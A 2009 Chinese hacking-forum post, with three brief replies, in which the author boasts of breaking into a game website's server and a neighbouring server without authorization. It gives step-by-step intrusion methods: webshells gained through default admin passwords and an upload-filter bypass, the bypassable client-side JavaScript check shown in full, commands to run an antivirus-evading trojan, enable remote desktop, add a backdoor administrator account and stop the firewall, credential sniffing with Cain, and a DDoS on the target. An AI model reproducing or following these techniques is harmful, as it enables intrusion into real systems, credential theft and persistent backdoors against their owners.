WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 1864查看
  • 3回复

[经验分享] 一次愉快的入侵

主题

好友

-50

积分

禁止访问

发表于 2009-12-21 15:33:31 |显示全部楼层
一个网络朋友,叫我搞个游戏库。。。呵呵。。。随便写写入侵手记。。。呵呵。。分享经验麻。。。
目标站:www.xxx.net  呵呵,打开看看是个ASPX语言的整站程序。。。。。估计没有漏洞。。。
1.试下所有关于ASPX检测的,,,呵呵。。。白忙。。。这下又用Domain 查询下www.xxx.net 这个服务器IP上邦了多少个域名。NND一个也没有。。。。。
2.拿Super Scan scan下端口。。。就开了个25 80。110。。389。等等。。。都是垃圾的端口。。没有利用价值。。本来扫描端口我是想看看有没有开放3389 和 53端口。。。。如果53端口开放的话。。。。可以用DNS.EXE益出 。。碰碰运气。。。。呵呵。。倒坍。。。运气糟糕死。。。。。好了。。都这样了。。继续我的第三个思路吧。。。
3.用webtoll 4.0 查询下C段 。搞渗透。呵呵。看有没有可能弄到一台3389服务器。。。。
首先用它扫描80端口。。。一般是服务器。。都开放。。。等下就一个一个的检测。。。。。


呵呵,。。其实这个入侵。。。是从前天开始的。。。原先我就这样搞了。。那天很幸运。。。搞了第一个C段一个服务器上就有了个webshell。。。。www.xxxx.com/xx.asa 呵呵。。。。其实我用默认的管理用户和密码进去的。。弄到了个shell心里也很高兴了。。想想。。。又可以继续玩下去。。。想想再提权下。。就可以Sinffer目标服务器了。。呵呵。。。

打开shell看看。。。查看下服务器组件。。。牙的...wscript.shell × 命令行执行组件 被删除了。。。
555555伤感哦。。。提权难度增加了。。。呵呵。。不过上天还是可怜了我。。。我scan 下ports 呵呵。。
3389关闭。。127.0.0.1:43958.........开放
其实我也不知道这个能不能运行。。。CMD。。。我试着上传个txt到E盘下。。倒霉又来了。。不可写入。。这回真见鬼了。。。想想。。还有个地方让我写入。。。既然。。我们能写入SHell当然那个地方能让我们写入了。。呵呵。。。传上去了。。。E:\\web\....\1.txt 呵呵。。。

这下子如何。。。验证。。。SU提权那里怎么可不可以使用呢?呵呵。。用个COPY命令吧。。。
cmd /c copy E:\\web\....\1.txt  E:\\web\....\1.bat 呵呵。。我运行完毕。。。回头一看。。。OK..能COPY成功说明能运行命令。。。 哈哈。。高兴了。。这回提权是100%的把握了。。再传个免杀木马上去吧。。。。

我把我用得免杀木马传上去。。E:\\web\....\kill.exe 呵呵。。然后一样的原理。。。
用SU提权那里:cmd /c start E:\\web\....\kill.exe  把命令运行完毕了。。。
回头看看目录里果然文件消失了。。说明成功运行了。。

这下高兴的开鸽子看看。。牙的。。一个也没有上。。。分析下。。原来。。鸽子上线地址。。空间出问题。了。。吗的。。气死了。。上不了线了。。。

这下又换下思维。。。不等那个垃圾空间上线了。。。想想。。现在传个开3389工具上去。。。把服务器的3389的终端给开了。。把它传上去E:\\web\....\3389.exe 一样使用SU提权那里运行。。
命令:cmd /c start E:\\web\....\3389.exe   OK………………运行完毕。。。

心里知道一定100%能开3389成功。。。呵呵。。很有把握啊。。一般不能立即生效。。。呵呵。。
再来一个远程重起命令吧。。。。
一样用SU提权那里:cmd /c shutdown -r 呵呵。。。运行完毕。。。。等了20秒过去了。。
ping www.xxx.net  反回值 Pinging xxx.0.0.1 with 32 bytes of data:  呵呵 。。说明重起命令有成功了。。。
心里黯黯高兴。。。。等下再:cmd /c net user hacker zhiyin /add & net localgroup administrators hacker /add  呵呵加个管理用户就可以直接3389进去了。。心里是这样想的。。
55555  等服务器重起好的时候。。。。。我这么连接都是。。。无法连接。。。我再用SCan扫描下。。。端口开了啊。。。为什么啊。。。。想了想。。。。可能是服务器的放火墙搞的鬼。。。让我把你结束吧。。。同样SU提权那里运行命令:cmd /c net stop sharedaccess 呵呵。。。再连接。。。OK进去了。。。下面的工作即使Sinffer..从网站下下载了cain1.rar先把驱动装好。。。重起了下。。。等待。。。就是开cain.exe嗅探了。。

一切准备就绪。。。开始设置下:网卡。。和修探的。。。相关设置。。。。ping 下目标机器的IP ping www.xxx.net 呵呵 IP返回:xxx.xxx.x.xxx  这下就开始。。。嗅了。。。呵呵。。返回的数据包还真大。。嗅没有几分钟。。。。就出现了很多user 和 password 哈哈。。。即使没有搞到游戏库。。不过已经成功一大半了。。。呵呵。。看到那些东西。。心里豪爽。。。么么。。。黯然娱乐哦。。。嘎嘎。。。

想想弄到这些破账号没有用啊。。。。那又怎么搞到终端的账号和密码呢。。。。不能弄3389密码。。也弄个ftp密码或者 1433密码也好啊。。。但是如何让目标服务器管理员。。。登陆呢。。然后嗅到呢。。。

哈哈 。。想想DDOS排它上场了。。。呵呵。。我叫朋友。。。用DDOS D死目标服务器。。。
修探就让它在那里嗅着吧。。。搞到这里已经天亮了。。。呼呼。。。。眼睛又疼死啊。。。又困又累了。。。
诶 ,让sinffer在那里工作吧。。。该洗个澡睡觉去。。。呵呵。。希望我起床。。。 能。。。让我看到。。
那里会多出我想要的东西来。。。呵呵。。就这样我洗澡睡觉去了。。。。第一次入侵目标机器到此结束。。。




晚上:
我起床时候已经是晚上11点多了。。。一开电脑就先mstsc /connel /v:www.xxx.net 呵呵。。。心里很期待。。。
就在这个时候让我失望了。。。给我返回的是一个“登”的声音。。:“客户端无法连接到远程计算机”我哭啊。。辛苦弄到的服务器。。就这样被管理发现了。。。。白火了。。心一下子突然凉了。。。。没戏了。。


不过想到,已经把木马种植上去。。如果管理员不把服务器重做系统的话。。。
那么还能保存到服务器肉鸡哦。。呵呵。。不过现在已经把心搞凉了很多了。。
期待管理员把服务器开起来啊。。。。
一直等。。。等到。。。新的一天。。中午了。。。服务器还没有恢复。。。估计没有戏了。。。。
诶。。。。。

时间又推移到昨天晚上:
呵呵。。其实我很无聊。。。一直睡觉到3点时候。。。朋友叫起床。。。出去吃夜宵。。呵呵。。看下表晚上3点多了。。。呵呵。。吃回来。。。已经4点多多了。。。想想。。。那个目标服务器。。。。
诶。。不干心啊。。。。还是重来。。这回。。。。搞了目标服务器边上的一个服务器。。。
下面来看下,如何搞吧。。。。
思路还是那几个思路。。只是耐心问题。。和。。细心问题。。。
先用Domain 查询下。。。那个IP xxx.xxx.x.xxx 呵呵。。。出来很多站 。。。。
现在用到批量网站检测工具:扫描下后台地址。。。呵呵。。确实出来很多。。不过都不存在。。。默认的MDB 还有SUperuser 和 password 呵呵。。心里一点底也没有。。。心里无聊漫无目的的用啊D注入工具扫描下有没有注入点。。。。。牙的。。。还真牛。。。一个站也没有。。


这下。。。还是回到Domain上来。。。。我想到。。。可以看看这么多站 。。一定有上传的地方。。。
呵呵。。。扫描了下。。。确实如我想象的那样。。。。
哈哈。。打开第一个页面upfile.asp就弹出可爱的界面。。。。。
呵呵。。试着上传个ASP呵呵。。提示只能上传。。gif 和JPG呵呵 这么简单的提示。。。。
我查看原代码。。。
呵呵有如下的关键代码:<script language="javascript">
function See(hh,ff) {
hh.src=ff.value
}
function mysubmit(theform)
{
if(theform.big.value=="")
{
alert("请点击浏览按钮,选择您要上传的JPG或GIF文件!")
theform.big.focus;
return (false);
}
else
{
str= theform.big.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=".jpg" && extname!=".gif")
{
alert("请选择JPG或GIF格式的文件!");
return (false);
}
}
return (true);
}
</script>

呵呵。。。明显的本地验证哦。。。。把它去掉。。然后修改下。。。再POST哈哈。。。
果然真的可以POST了。。。可惜。。。
<body>
<br>化境文件上传!<hr size=1 noshadow width=300 align=left><br><br>
化境HTTP上传程序 Version 2.0<br><br>=DIY.aspact=upload<br>fname=D:\Newmm.gif<br>submit=上传<br><br>DIY.ASP<SCRIPT language=javascript>
parent.document.form.a.value=''../UpProduct/DIY.jpg>1 个文件上传结束! [<a href="javascript:history.back();">返回</a>]</body></html>
真是不幸运。。。搞扫描鬼啊。。。。传了还给我自动改后缀。。。

诶。。。真没有办法了吗。。。。想到一个工具。。。老兵的。。。上传漏洞助手。。可以修改我们上传的文件文件路径字段和文件名字段。。。。呵呵。。。我试着POST。。。。嘎嘎。。。。返回可爱的信息:
<body>
<br>化境文件上传!<hr size=1 noshadow width=300 align=left><br><br>
化境HTTP上传程序 Version 2.0<br><br>=DIY.aspact=upload<br>fname=D:\Newmm.gif<br>submit=上传<br><br>DIY.ASP<SCRIPT language=javascript>
parent.document.form.a.value=''../UpProduct/DIY.ASP>1 个文件上传结束! [<a href="javascript:history.back();">返回</a>]</body></html>

哈哈。。这回该传个大马上去了。。。提权。。。。再终端。。。。跟上面写的一样这里我就不写了。。。
呵呵。。。一边搞站。。。一边看着。。韩国电视电视继。。。<伟大的盖茨>哈哈 看到第7集了呵呵。。
一边看着帅哥美女们的纷纷感情故事。。。又一边日站。。。哈哈。。。搞得桌面很乱。。。呵呵。。留个图片纪念吧。。嘎嘎。。希望我的后续更加精彩。。。。

主题

好友

980

积分

高级会员

发表于 2010-1-6 13:12:04 |显示全部楼层
没人 太多了   我来看看
回复

使用道具 举报

主题

好友

958

积分

高级会员

发表于 2010-1-6 23:30:04 |显示全部楼层
看看到底是什么
回复

使用道具 举报

主题

好友

116

积分

注册会员

发表于 2010-1-7 12:34:40 |显示全部楼层
就是太多了新手不能理解!
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-21 14:17 , Processed in 0.059402 second(s), 16 queries .

返回顶部